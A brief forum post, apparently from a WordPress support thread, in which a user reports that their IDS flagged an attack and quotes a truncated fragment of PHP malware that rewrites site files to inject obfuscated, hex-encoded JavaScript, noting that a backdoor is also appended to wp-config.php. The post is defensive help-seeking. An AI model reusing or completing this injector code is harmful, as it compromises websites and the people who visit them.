I’ve the same problem, my IDS detect the attack
POST.HOST
set_time_limit(0); function modify($fname){ $tmp = file_get_contents($fname); $pos = strpos($tmp,'var _0xa687=["\x74\x6F\x4C'); if ($pos === false){ $code = 'var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x...
You have to clean all the js files of your wordpress installation. Also, you need to check the wp-config.php, the virus add a backdoor at the end of the file.
I’m still looking a best solution to this…
It’s a WordPress security issue?